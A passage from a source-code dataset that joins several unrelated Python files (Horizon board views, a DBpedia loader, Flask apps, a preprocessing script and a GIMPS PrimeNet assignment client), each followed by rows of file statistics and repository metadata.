class RemovePluginsView(forms.ModalFormView):
template_name = 'project/boards/removeplugins.html'
modal_header = _("Remove Plugins from board")
form_id = "remove_boardplugins_form"
form_class = project_forms.RemovePluginsForm
submit_label = _("Remove Plugins from board")
# submit_url = reverse_lazy("horizon:project:boards:removeplugins")
submit_url = "horizon:project:boards:removeplugins"
success_url = reverse_lazy('horizon:project:boards:index')
page_title = _("Remove Plugins from board")
@memoized.memoized_method
def get_object(self):
try:
return iotronic.board_get(self.request, self.kwargs['board_id'],
None)
except Exception:
redirect = reverse("horizon:project:boards:index")
exceptions.handle(self.request,
_('Unable to get board information.'),
redirect=redirect)
def get_context_data(self, **kwargs):
context = super(RemovePluginsView, self).get_context_data(**kwargs)
args = (self.get_object().uuid,)
context['submit_url'] = reverse(self.submit_url, args=args)
return context
def get_initial(self):
board = self.get_object()
# Populate plugins
# TO BE DONE.....filter by available on this board!!!
# plugins = iotronic.plugin_list(self.request, None, None)
plugins = iotronic.plugins_on_board(self.request, board.uuid)
plugins.sort(key=lambda b: b.name)
plugin_list = []
for plugin in plugins:
plugin_list.append((plugin.uuid, _(plugin.name)))
return {'uuid': board.uuid,
'name': board.name,
'plugin_list': plugin_list}
class DetailView(tabs.TabView):
tab_group_class = project_tabs.BoardDetailTabs
template_name = 'horizon/common/_detail.html'
page_title = "{{ board.name|default:board.uuid }}"
def get_context_data(self, **kwargs):
context = super(DetailView, self).get_context_data(**kwargs)
board = self.get_data()
context["board"] = board
context["url"] = reverse(self.redirect_url)
context["actions"] = self._get_actions(board)
return context
def _get_actions(self, board):
table = project_tables.BoardsTable(self.request)
return table.render_row_actions(board)
@memoized.memoized_method
def get_data(self):
board_id = self.kwargs['board_id']
try:
board_services = []
board_plugins = []
board = iotronic.board_get(self.request, board_id, None)
board_services = iotronic.services_on_board(self.request, board_id, True)
board._info.update(dict(services=board_services))
board_plugins = iotronic.plugins_on_board(self.request, board_id)
board._info.update(dict(plugins=board_plugins))
# LOG.debug("BOARD: %s\n\n%s", board, board._info)
except Exception:
msg = ('Unable to retrieve board %s information') % {'name':
board.name}
exceptions.handle(self.request, msg, ignore=True)
return board
def get_tabs(self, request, *args, **kwargs):
board = self.get_data()
return self.tab_group_class(request, board=board, **kwargs)
class BoardDetailView(DetailView):
redirect_url = 'horizon:project:boards:index'
def _get_actions(self, board):
table = project_tables.BoardsTable(self.request)
return table.render_row_actions(board)
| 35.774892 | 87 | 0.640973 | 930 | 8,264 | 5.505376 | 0.205376 | 0.047266 | 0.039063 | 0.031641 | 0.532422 | 0.486133 | 0.419141 | 0.361133 | 0.318359 | 0.298047 | 0 | 0.000818 | 0.260528 | 8,264 | 230 | 88 | 35.930435 | 0.837015 | 0.106607 | 0 | 0.453416 | 0 | 0 | 0.142644 | 0.064529 | 0 | 0 | 0 | 0 | 0 | 1 | 0.074534 | false | 0 | 0.086957 | 0 | 0.465839 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad8ad52f4e1eb69af645bff60f5f340b30df206b | 2,881 | py | Python | code/python/src/slub_docsa/data/load/dbpedia.py | slub/docsa | c33a8243a60fbccbcd0a6418a59337e4ed39dc75 | [
"Apache-2.0"
] | 11 | 2022-01-05T17:19:10.000Z | 2022-02-14T18:57:37.000Z | code/python/src/slub_docsa/data/load/dbpedia.py | slub/docsa | c33a8243a60fbccbcd0a6418a59337e4ed39dc75 | [
"Apache-2.0"
] | null | null | null | code/python/src/slub_docsa/data/load/dbpedia.py | slub/docsa | c33a8243a60fbccbcd0a6418a59337e4ed39dc75 | [
"Apache-2.0"
] | null | null | null | """Loads Dbpedia resources."""
import logging
import os
import bz2
import re
from typing import Iterator
import urllib.request
import urllib.parse
import shutil
from slub_docsa.common.paths import get_resources_dir
logger = logging.getLogger(__name__)
def _get_dbpedia_download_url(lang_code):
filename = f"short-abstracts_lang={lang_code}.ttl.bz2"
return f"https://databus.dbpedia.org/dbpedia/text/short-abstracts/2020.07.01/{filename}"
def _get_dbpedia_abstracts_filepath(lang_code, dbpedia_resources_dir: str = None):
if dbpedia_resources_dir is None:
dbpedia_resources_dir = os.path.join(get_resources_dir(), "dbpedia")
return os.path.join(dbpedia_resources_dir, f"short-abstracts_lang={lang_code}.ttl.bz2")
def _download_dbpedia_abstracts(lang_code: str, filepath: str = None, dbpedia_resources_dir: str = None):
# create resources dir if not exists
if dbpedia_resources_dir is None:
dbpedia_resources_dir = os.path.join(get_resources_dir(), "dbpedia")
os.makedirs(dbpedia_resources_dir, exist_ok=True)
if filepath is None:
filepath = _get_dbpedia_abstracts_filepath(lang_code, dbpedia_resources_dir)
if not os.path.exists(filepath):
logging.info("downloading dbpedia abstracts, this may take a while ... ")
url = _get_dbpedia_download_url(lang_code)
with urllib.request.urlopen(url) as request, open(filepath, 'wb') as file: # nosec
shutil.copyfileobj(request, file)
def read_dbpedia_abstracts(lang_code: str, limit=None, filepath: str = None) -> Iterator[str]:
"""Return an iteator of dbpedia abstracts.
Parameters
----------
lang_code: str
The language code of DBpedia resources to load.
limit: int | None
The maximum number of abstracts to return. Returns all abstracts if None.
filepath: str | None
The path to the dbpedia abstracts resource file. Is set automatically relative to the
`<resources_dir>/dbpedia/` directory if set to None.
File will be downloaded unless it already exists.
Returns
-------
Iterator[str]
Each abstract as string.
"""
_download_dbpedia_abstracts(lang_code, filepath)
line_pattern_str = r"^<([^>]+)> <http://www.w3.org/2000/01/rdf-schema#comment> \"(.*)\"@" + lang_code + r" .$"
line_pattern = re.compile(line_pattern_str)
n_abstracts = 0
with bz2.open(_get_dbpedia_abstracts_filepath(lang_code), "rt", encoding="utf-8") as file:
while True:
line = file.readline()
if not line:
break
if limit is not None and n_abstracts > limit:
break
line_match = line_pattern.match(line)
if line_match:
abstract = line_match.group(2).replace("\\", "")
n_abstracts += 1
yield abstract
| 34.297619 | 114 | 0.681708 | 381 | 2,881 | 4.931759 | 0.330709 | 0.089409 | 0.091006 | 0.043108 | 0.292709 | 0.22512 | 0.175625 | 0.175625 | 0.1405 | 0.083023 | 0 | 0.010218 | 0.218674 | 2,881 | 83 | 115 | 34.710843 | 0.824522 | 0.199236 | 0 | 0.133333 | 0 | 0.044444 | 0.135631 | 0.03581 | 0 | 0 | 0 | 0 | 0 | 1 | 0.088889 | false | 0 | 0.2 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad8aed8943e8306c7fac13a1b0dbc48bd894fc3f | 925 | py | Python | app/apiv2/users/apikeys/apikeys.py | matthewstrasiotto/suite | 8d83208f965f23e0a33db6b3b7f9e5126f7324f8 | [
"MIT"
] | null | null | null | app/apiv2/users/apikeys/apikeys.py | matthewstrasiotto/suite | 8d83208f965f23e0a33db6b3b7f9e5126f7324f8 | [
"MIT"
] | null | null | null | app/apiv2/users/apikeys/apikeys.py | matthewstrasiotto/suite | 8d83208f965f23e0a33db6b3b7f9e5126f7324f8 | [
"MIT"
] | null | null | null | from flask_restful import marshal, reqparse, Resource
from app.apiv2.marshal import api_key_fields
from app.constants import API_ENVELOPE
from app.models import ApiKey
from app.apiv2.decorators import permission_self
class ApiKeysApi(Resource):
method_decorators = [permission_self]
def get(self, user_id):
apikeys = ApiKey.query.filter_by(user_id=user_id).all()
return {
API_ENVELOPE:
[marshal(apikey, api_key_fields) for apikey in apikeys]
}
def post(self, user_id):
parser = reqparse.RequestParser()
parser.add_argument("name", type=str, required=True)
parameters = parser.parse_args(strict=True)
# This function handles all the db logic
plaintext_key = ApiKey.generate_key(user_id, parameters.get("name"))
# NOTE - this is the ONLY time the key will be in plaintext
return {"key": plaintext_key}
| 29.83871 | 76 | 0.692973 | 122 | 925 | 5.081967 | 0.508197 | 0.048387 | 0.03871 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002793 | 0.225946 | 925 | 30 | 77 | 30.833333 | 0.863128 | 0.103784 | 0 | 0 | 0 | 0 | 0.013317 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.263158 | 0 | 0.578947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad8c29439c9dfeb27b8518c84b1e929c57b7ee9e | 502 | py | Python | src/DispatchBypass.py | worseliz/HERON | fa5f346a0bc9f9d5ea4659618ffeb52bea812cee | [
"Apache-2.0"
] | 11 | 2020-07-28T21:35:26.000Z | 2022-01-25T17:31:39.000Z | src/DispatchBypass.py | worseliz/HERON | fa5f346a0bc9f9d5ea4659618ffeb52bea812cee | [
"Apache-2.0"
] | 112 | 2020-07-29T15:25:33.000Z | 2022-03-31T19:21:00.000Z | src/DispatchBypass.py | worseliz/HERON | fa5f346a0bc9f9d5ea4659618ffeb52bea812cee | [
"Apache-2.0"
] | 22 | 2020-07-28T20:08:12.000Z | 2022-03-08T21:22:03.000Z |
# Copyright 2020, Battelle Energy Alliance, LLC
# ALL RIGHTS RESERVED
"""
Class for mimicking ARMA structure
"""
import numpy as np
def run(raven, raven_dict):
"""
Makes ARMA-like data structure, same guy every time.
@ In, raven, object, RAVEN variables object
@ In, raven_dict, dict, additional RAVEN information
@ Out, None
"""
# take some time working hard
for i in range(int(1e5)):
x = 2**i
# result
raven.NPV = np.random.rand()
raven.time_delta = 3.14159
| 19.307692 | 56 | 0.667331 | 72 | 502 | 4.611111 | 0.736111 | 0.054217 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033592 | 0.229084 | 502 | 25 | 57 | 20.08 | 0.824289 | 0.593626 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.166667 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad8d84cf6d9b97e46819336d81f9b391abf36f90 | 1,565 | py | Python | preprocess.py | x4nth055/sentiment_analysis_naive_bayes | cccf893403aac0a8c85a8b6bf46c1895af0fc3c2 | [
"MIT"
] | 4 | 2019-04-08T00:54:14.000Z | 2021-09-19T19:22:57.000Z | preprocess.py | x4nth055/sentiment_analysis_naive_bayes | cccf893403aac0a8c85a8b6bf46c1895af0fc3c2 | [
"MIT"
] | null | null | null | preprocess.py | x4nth055/sentiment_analysis_naive_bayes | cccf893403aac0a8c85a8b6bf46c1895af0fc3c2 | [
"MIT"
] | 3 | 2019-04-08T00:54:16.000Z | 2022-02-09T22:06:15.000Z | from sklearn.feature_extraction.text import CountVectorizer
from sklearn.model_selection import train_test_split
import pickle
CATEGORY = {"positive": 1, "negative": 0}
CATEGORY_INVERSED = {1: "positive", 0: "negative"}
def load_data():
"""Loads review data and returns:
X_train: reviews for training set
X_test: reviews for testing set
y_train: labels for training set
y_test: labels for testing test
count_vector: CountVectorizer object that fits training data,
it is just a matrix of word (token) counts"""
# read reviews
with open("data/reviews.txt") as f:
reviews = f.readlines()
reviews = [ review.strip() for review in reviews ]
# read its corresponding labels
with open("data/labels.txt") as f:
labels = f.readlines()
labels = [ CATEGORY[label.strip()] for label in labels ]
# split data to test and train
# 85% train 15% test
X_train, X_test, y_train, y_test = train_test_split(reviews, labels, test_size=0.15)
# print(X_train[5])
# to count words of each row ( each review )
# more at https://scikit-learn.org/stable/modules/generated/sklearn.feature_extraction.text.CountVectorizer.html#sklearn.feature_extraction.text.CountVectorizer
count_vector = CountVectorizer()
X_train = count_vector.fit_transform(X_train)
X_test = count_vector.transform(X_test)
print("Saving counting vector...")
pickle.dump(count_vector, open("results/count_vector.pickle", "wb"))
return X_train, X_test, y_train, y_test | 35.568182 | 164 | 0.699042 | 218 | 1,565 | 4.857798 | 0.399083 | 0.033994 | 0.067989 | 0.07932 | 0.122757 | 0.041549 | 0.041549 | 0.041549 | 0 | 0 | 0 | 0.009623 | 0.203195 | 1,565 | 44 | 165 | 35.568182 | 0.839615 | 0.372524 | 0 | 0 | 0 | 0 | 0.126898 | 0.029284 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.157895 | 0 | 0.263158 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad8e4f71024e8e3d341b221f12c5dc2d0e5e43ed | 2,129 | py | Python | app.py | sammytran277/good-news-aggregator | 4ba7d8adfea5e370ef22367aa4468592d15995f6 | [
"MIT"
] | null | null | null | app.py | sammytran277/good-news-aggregator | 4ba7d8adfea5e370ef22367aa4468592d15995f6 | [
"MIT"
] | null | null | null | app.py | sammytran277/good-news-aggregator | 4ba7d8adfea5e370ef22367aa4468592d15995f6 | [
"MIT"
] | null | null | null | from flask import Flask, render_template, request, flash
from random import shuffle
import sqlite3
app = Flask(__name__)
@app.route("/")
def index():
"""Landing page with all the scraped news articles"""
# Get articles and random quote by calling their respective functions
articles = lookup_articles()
quote = get_quote()
return render_template("index.html", quote=quote, articles=articles)
@app.route("/about")
def about():
"""About page with basic information about the app"""
return render_template("about.html")
@app.route("/search")
def search():
"""Search results page with filtered content"""
keyword = request.args.get("q")
all_articles = lookup_articles()
filtered_articles = []
# Iterate through all articles and check if keyword is in the title
for article in all_articles:
title = article["title"]
# Compare keyword to each word in the article's title
if keyword in title.split() or keyword.capitalize() in title.split():
filtered_articles.append(article)
return render_template("search.html",
num_of_articles=len(filtered_articles),
keyword=keyword,
articles=filtered_articles)
def lookup_articles():
"""Looks up articles from the database"""
# Connect to SQLite database
conn = sqlite3.connect("aggregator.db")
c = conn.cursor()
articles = []
# Add each article as a dictionary to the articles list
for article in c.execute("SELECT link, image, title FROM articles"):
articles.append({"link": article[0],
"image": article[1],
"title": article[2]})
shuffle(articles)
return articles
def get_quote():
"""Returns a random quote to be displayed on the page"""
# Connect to SQLite database
conn = sqlite3.connect("aggregator.db")
c = conn.cursor()
# Get a random quote from the database and return it
for quote in c.execute("SELECT quote FROM quotes ORDER BY RANDOM() LIMIT 1"):
return quote[0]
| 27.294872 | 81 | 0.643964 | 265 | 2,129 | 5.09434 | 0.358491 | 0.041481 | 0.044444 | 0.034074 | 0.094815 | 0.094815 | 0.094815 | 0.094815 | 0.094815 | 0.094815 | 0 | 0.005054 | 0.256458 | 2,129 | 77 | 82 | 27.649351 | 0.847757 | 0.267731 | 0 | 0.1 | 0 | 0 | 0.117878 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.075 | 0 | 0.325 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad8fc5738e7a66bd8c364a796802538e483498f5 | 58,405 | py | Python | primenet.py | joye1503/Distributed-Computing-Scripts | 7ef1b24ab833be8a0dc109dc0495bbda95d93440 | [
"MIT"
] | null | null | null | primenet.py | joye1503/Distributed-Computing-Scripts | 7ef1b24ab833be8a0dc109dc0495bbda95d93440 | [
"MIT"
] | null | null | null | primenet.py | joye1503/Distributed-Computing-Scripts | 7ef1b24ab833be8a0dc109dc0495bbda95d93440 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
Automatic assignment handler for Mlucas and CUDALucas.
[*] Revised by Teal Dulcet and Daniel Connelly for CUDALucas (2020)
Original Authorship(s):
* # EWM: adapted from https://github.com/MarkRose/primetools/blob/master/mfloop.py
by teknohog and Mark Rose, with help rom Gord Palameta.
* # 2020: support for computer registration and assignment-progress via
direct Primenet-v5-API calls by Loïc Le Loarer <loic@le-loarer.org>
[*] List of supported v5 operations:
* Update Comptuer Info (Register Assignment) (Credit: Loarer)
* Program Options (po) (Credit: Connelly)
* Get Assignment (ga, primenet_fetch) (Credit: Connelly & Loarer)
* Register Assignment (ra) (Credit: Connelly) NOTE: DONE; not used
* Assignment Un-Reserve (au) (Credit: Connelly) NOTE: Done, not used
* Assignment Progress (ap,update_progress) (Credit: Loarer)
* Assignment Result (ar,submit_one_line_v5) (Credit: Loarer)
'''
################################################################################
# #
# (C) 2017-2020 by Daniel Connelly and Teal Dulcet. #
# #
# This program is free software; you can redistribute it and/or modify it #
# under the terms of the GNU General Public License as published by the #
# Free Software Foundation; either version 2 of the License, or (at your #
# option) any later version. #
# #
# This program is distributed in the hope that it will be useful, but WITHOUT #
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or #
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for #
# more details. #
# #
# You should have received a copy of the GNU General Public License along #
# with this program; see the file GPL.txt. If not, you may view one at #
# http://www.fsf.org/licenses/licenses.html, or obtain one by writing to the #
# Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA #
# 02111-1307, USA. #
# #
################################################################################
from __future__ import division, print_function
import subprocess
from random import getrandbits
from collections import namedtuple
import sys
import os.path
import re
import time
import optparse
from hashlib import sha256
import json
import platform
import logging
try:
import requests
except ImportError:
print("Installing requests as dependency")
subprocess.check_output("pip install requests", shell=True)
print("The Requests library has been installed. Please run the program again")
sys.exit(0)
try:
# Python3
from urllib.parse import urlencode
from requests.exceptions import ConnectionError, HTTPError
except ImportError:
# Python2
from urllib import urlencode
from urllib2 import URLError as ConnectionError
from urllib2 import HTTPError
try:
from configparser import ConfigParser, Error as ConfigParserError
except ImportError:
from ConfigParser import ConfigParser, Error as ConfigParserError # ver. < 3.0
if sys.version_info[:2] >= (3, 7):
# If is OK to use dict in 3.7+ because insertion order is guaranteed to be preserved
# Since it is also faster, it is better to use raw dict()
OrderedDict = dict
else:
try:
from collections import OrderedDict
except ImportError:
# For python2.6 and before which don't have OrderedDict
try:
from ordereddict import OrderedDict
except ImportError:
# Tests will not work correctly but it doesn't affect the functionnality
OrderedDict = dict
s = requests.Session() # session that maintains our cookies
# [***] Daniel Connelly's functions
# get assignment
def ga(guid):
args = primenet_v5_bargs.copy()
args["t"] = "ga" # transaction type
args["g"] = guid
args["c"] = options.cpu
args["a"] = ""
return args
# register assignment
def ra(n):
'''Note: this function is not used'''
args = primenet_v5_bargs.copy()
args["t"] = "ra"
args["g"] = get_guid(config)
args["c"] = options.cpu
args["b"] = 2
args["n"] = n
args["w"] = options.worktype
return args
# unreserve assignment
def au(k):
args = primenet_v5_bargs.copy()
args["t"] = "au"
args["g"] = get_guid(config)
args["k"] = k
return args
# TODO -- have people set their own program options for commented out portions
def program_options(guid):
args = primenet_v5_bargs.copy()
args["t"] = "po"
args["g"] = guid
args["c"] = "" # no value updates all cpu threads with given worktype
args["w"] = options.worktype if config.has_option("primenet", "first_time") is False \
or hasattr(opts_no_defaults, "worktype") else ""
# args["nw"] = 1
# args["Priority"] = 1
args["DaysOfWork"] = options.days_work if config.has_option("primenet", "first_time") is False \
or hasattr(opts_no_defaults, "days_work") else ""
# args["DayMemory"] = 8
# args["NightMemory"] = 8
# args["DayStartTime"] = 0
# args["NightStartTime"] = 0
# args["RunOnBattery"] = 1
result = send_request(guid, args)
config_updated = False
if result is None or int(result["pnErrorResult"]) != 0:
parser.error("Error while setting program options on mersenne.org")
if "w" in result:
config.set("primenet", "worktype", result["w"])
config_updated = True
if "DaysOfWork" in result:
config.set("primenet", "days_work", result["DaysOfWork"])
config_updated = True
if config.has_option("primenet", "first_time") is False:
config.set("primenet", "first_time", "false")
config_updated = True
if "w" in result or "DaysOfWork" in result:
merge_config_and_options(config, options)
if config_updated:
config_write(config)
def unreserve_all(guid):
if guid is None:
debug_print("Cannot unreserve, the registration is not done",
file=sys.stderr)
w = readonly_list_file(workfile)
tasks = greplike(workpattern, w)
for task in tasks:
assignment = get_progress_assignment(task)
args = au(assignment.id)
result = send_request(guid, args)
if result is None or int(result["pnErrorResult"]) != 0:
debug_print("ERROR while releasing assignment on mersenne.org: assignment_id={0}".format(
assignment.id), file=sys.stderr)
# TODO: Delete task from workfile
def return_code(result, aid):
'''Check if the return code is not OKAY and do something about it
@param result - return from send_request()
@param aid - ?
'''
rc = int(result["pnErrorResult"])
if rc == primenet_api.ERROR_OK:
debug_print(
"Result correctly send to server: assignment_id={0}".format(aid))
return True
else: # non zero ERROR code
debug_print("ERROR while submitting result on mersenne.org: assignment_id={0}".format(
aid), file=sys.stderr)
if rc is primenet_api.ERROR_UNREGISTERED_CPU:
# should register again and retry
debug_print(
"ERROR UNREGISTERED CPU: Please remove guid line from local.ini, run with and retry", file=sys.stderr)
return False
elif rc is primenet_api.ERROR_INVALID_PARAMETER:
debug_print(
"INVALID PARAMETER: this is a bug in the script, please create an issue: https://github.com/tdulcet/Distributed-Computing-Scripts/issues", file=sys.stderr)
return False
else:
# In all other error case, the submission must not be retried
return True
def get_cpu_signature():
output = ""
if platform.system() == "Windows":
output = subprocess.check_output('wmic cpu list brief').decode()
elif platform.system() == "Darwin":
os.environ['PATH'] = os.environ['PATH'] + os.pathsep + '/usr/sbin'
command = "sysctl -n machdep.cpu.brand_string"
output = subprocess.check_output(command).decode().strip()
elif platform.system() == "Linux":
with open('/proc/cpuinfo', 'r') as f1:
all_info = f1.read()
for line in all_info.split("\n"):
if "model name" in line:
output = re.sub(".*model name.*:", "", line, 1).lstrip()
break
return output
def get_cpu_name(signature):
'''Note: Not used'''
search = re.search(
r'\bPHENOM\b|\bAMD\b|\bATOM\b|\bCore 2\b|\bCore(TM)2\b|\bCORE(TM) i7\b|\bPentium(R) M\b|\bCore\b|\bIntel\b|\bUnknown\b|\bK5\b|\bK6\b', signature)
return search.group(0) if search else ""
cpu_signature = get_cpu_signature()
cpu_brand = get_cpu_name(cpu_signature)
# END Daniel's Functions
primenet_v5_burl = "http://v5.mersenne.org/v5server/?"
PRIMENET_TRANSACTION_API_VERSION = 0.95
VERSION = 19
primenet_v5_bargs = OrderedDict(
(("px", "GIMPS"), ("v", PRIMENET_TRANSACTION_API_VERSION)))
primenet_baseurl = "https://www.mersenne.org/"
primenet_login = False
class primenet_api:
ERROR_OK = 0
ERROR_SERVER_BUSY = 3
ERROR_INVALID_VERSION = 4
ERROR_INVALID_TRANSACTION = 5
# Returned for length, type, or character invalidations.
ERROR_INVALID_PARAMETER = 7
ERROR_ACCESS_DENIED = 9
ERROR_DATABASE_CORRUPT = 11
ERROR_DATABASE_FULL_OR_BROKEN = 13
# Account related errors:
ERROR_INVALID_USER = 21
# Computer cpu/software info related errors:
ERROR_UNREGISTERED_CPU = 30
ERROR_OBSOLETE_CLIENT = 31
ERROR_STALE_CPU_INFO = 32
ERROR_CPU_IDENTITY_MISMATCH = 33
ERROR_CPU_CONFIGURATION_MISMATCH = 34
# Work assignment related errors:
ERROR_NO_ASSIGNMENT = 40
ERROR_INVALID_ASSIGNMENT_KEY = 43
ERROR_INVALID_ASSIGNMENT_TYPE = 44
ERROR_INVALID_RESULT_TYPE = 45
ERROR_INVALID_WORK_TYPE = 46
ERROR_WORK_NO_LONGER_NEEDED = 47
PRIMENET_AR_NO_RESULT = 0 # No result, just sending done msg
PRIMENET_AR_TF_FACTOR = 1 # Trial factoring, factor found
PRIMENET_AR_P1_FACTOR = 2 # P-1, factor found
PRIMENET_AR_ECM_FACTOR = 3 # ECM, factor found
PRIMENET_AR_TF_NOFACTOR = 4 # Trial Factoring no factor found
PRIMENET_AR_P1_NOFACTOR = 5 # P-1 Factoring no factor found
PRIMENET_AR_ECM_NOFACTOR = 6 # ECM Factoring no factor found
PRIMENET_AR_LL_RESULT = 100 # LL result, not prime
PRIMENET_AR_LL_PRIME = 101 # LL result, Mersenne prime
PRIMENET_AR_PRP_RESULT = 150 # PRP result, not prime
PRIMENET_AR_PRP_PRIME = 151 # PRP result, probably prime
# Teal's addition
errors = {primenet_api.ERROR_SERVER_BUSY: "Server busy",
primenet_api.ERROR_INVALID_VERSION: "Invalid version",
primenet_api.ERROR_INVALID_TRANSACTION: "Invalid transaction",
primenet_api.ERROR_INVALID_PARAMETER: "Invalid parameter",
primenet_api.ERROR_ACCESS_DENIED: "Access denied",
primenet_api.ERROR_DATABASE_CORRUPT: "Server database malfunction",
primenet_api.ERROR_DATABASE_FULL_OR_BROKEN: "Server database full or broken",
primenet_api.ERROR_INVALID_USER: "Invalid user",
primenet_api.ERROR_UNREGISTERED_CPU: "CPU not registered",
primenet_api.ERROR_OBSOLETE_CLIENT: "Obsolete client, please upgrade",
primenet_api.ERROR_STALE_CPU_INFO: "Stale cpu info",
primenet_api.ERROR_CPU_IDENTITY_MISMATCH: "CPU identity mismatch",
primenet_api.ERROR_CPU_CONFIGURATION_MISMATCH: "CPU configuration mismatch",
primenet_api.ERROR_NO_ASSIGNMENT: "No assignment",
primenet_api.ERROR_INVALID_ASSIGNMENT_KEY: "Invalid assignment key",
primenet_api.ERROR_INVALID_ASSIGNMENT_TYPE: "Invalid assignment type",
primenet_api.ERROR_INVALID_RESULT_TYPE: "Invalid result type"}
def debug_print(text, file=sys.stdout):
if options.debug or file == sys.stderr:
caller_name = sys._getframe(1).f_code.co_name
if caller_name == '<module>':
caller_name = 'main loop'
caller_string = caller_name + ": "
print(progname + ": " + caller_string + " " + time.strftime("%Y-%m-%d %H:%M") +
" \t" + str(text), file=file)
file.flush()
def greplike(pattern, lines):
output = []
for line in lines:
s = pattern.search(line)
if s:
output.append(s.group(0))
return output
def num_to_fetch(line, targetsize):
num_existing = len(line)
num_needed = targetsize - num_existing
return max(num_needed, 0)
def readonly_list_file(filename, mode="r"):
# Used when there is no intention to write the file back, so don't
# check or write lockfiles. Also returns a single string, no list.
try:
with open(filename, mode=mode) as File:
contents = File.readlines()
return [x.rstrip() for x in contents]
except (IOError, OSError):
return []
def write_list_file(filename, line, mode="w"):
# A "null append" is meaningful, as we can call this to clear the
# lockfile. In this case the main file need not be touched.
if not ("a" in mode and len(line) == 0):
newline = b'\n' if 'b' in mode else '\n'
content = newline.join(line) + newline
with open(filename, mode) as File:
File.write(content)
def primenet_fetch(num_to_get):
if not options.username:
return []
# As of early 2018, here is the full list of assignment-type codes supported by the Primenet server; Mlucas
# v18 (and thus this script) supports only the subset of these indicated by an asterisk in the left column.
# Supported assignment types may be specified via either their PrimeNet number code or the listed Mnemonic:
# Worktype:
# Code Mnemonic Description
# ---- ----------------- -----------------------
# 0 Whatever makes the most sense
# 1 Trial factoring to low limits
# 2 Trial factoring
# 4 P-1 factoring
# 5 ECM for first factor on Mersenne numbers
# 6 ECM on Fermat numbers
# 8 ECM on mersenne cofactors
# *100 SmallestAvail Smallest available first-time tests
# *101 DoubleCheck Double-checking
# *102 WorldRecord World record primality tests
# *104 100Mdigit 100M digit number to LL test (not recommended)
# *150 SmallestAvailPRP First time PRP tests (Gerbicz)
# *151 DoubleCheckPRP Doublecheck PRP tests (Gerbicz)
# *152 WorldRecordPRP World record sized numbers to PRP test (Gerbicz)
# *153 100MdigitPRP 100M digit number to PRP test (Gerbicz)
# 160 PRP on Mersenne cofactors
# 161 PRP double-checks on Mersenne cofactors
# Convert mnemonic-form worktypes to corresponding numeric value, check worktype value vs supported ones:
option_dict = {"SmallestAvail": "100", "DoubleCheck": "101", "WorldRecord": "102", "100Mdigit": "104",
"SmallestAvailPRP": "150", "DoubleCheckPRP": "151", "WorldRecordPRP": "152", "100MdigitPRP": "153"}
if options.worktype in option_dict: # this and the above line of code enables us to use words or numbers on the cmdline
options.worktype = option_dict[options.worktype]
supported = set(['100', '101', '102', '104', '150', '151', '152', '153']
) if program == "MLucas" else set(['100', '101', '102', '104'])
if options.worktype not in supported:
debug_print("Unsupported/unrecognized worktype = " +
options.worktype + " for " + program)
return []
try:
# Get assignment (Loarer's way)
if options.password:
assignment = OrderedDict((
("cores", "1"),
("num_to_get", num_to_get),
("pref", options.worktype),
("exp_lo", ""),
("exp_hi", ""),
("B1", "Get Assignments")
))
openurl = primenet_baseurl + "manual_assignment/?"
debug_print("Fetching work via URL = " +
openurl + urlencode(assignment))
r = s.post(openurl, data=assignment)
return greplike(workpattern, [line.decode('utf-8', 'replace') for line in r.iter_lines()])
# Get assignment using V5 API
else:
guid = get_guid(config)
assignment = ga(guid) # get assignment
debug_print("Fetching work via V5 Primenet = " +
primenet_v5_burl + urlencode(assignment))
tests = []
for _ in range(num_to_get):
r = send_request(guid, assignment)
if r is None or int(r["pnErrorResult"]) != 0:
debug_print(
"ERROR while requesting an assignment on mersenne.org", file=sys.stderr)
break
if r['w'] not in supported:
debug_print("ERROR: Returned assignment from server is not a supported worktype for " + program + ".", file=sys.stderr)
return []
